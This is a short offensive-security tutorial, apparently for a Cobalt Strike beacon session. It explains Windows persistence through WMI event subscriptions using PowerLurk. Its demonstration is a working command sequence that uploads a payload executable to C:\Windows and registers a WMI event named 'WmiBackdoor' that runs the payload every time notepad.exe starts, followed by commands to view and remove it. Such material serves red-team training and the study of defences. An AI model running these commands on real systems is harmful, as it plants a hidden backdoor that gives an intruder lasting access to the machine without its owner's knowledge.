Requirements
High integrity or SYSTEM
In order to maintain persistence through WMI, we need three classes:
EventConsumer
: An action (i.e. execute payload—PowerShell, VBScript, etc)EventFilter
: A filter that defines what event to act onFilterToConsumerBinding
: Links an EventConsumer to EventFilter
We can build these WMI classes uses PowerLurk.
Demonstration
beacon> cd C:\Windows
beacon> upload C:\Payloads\dns_x64.exe
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe
You can view these classes afterwards using
Get-WmiEvent -Name WmiBackdoor
. TheCommandLineTemplate
for theEventConsumer
will simply beC:\Windows\dns_x64.exe
; and query for the EventFilter will beSELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'
.
To remove the backdoor:
Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject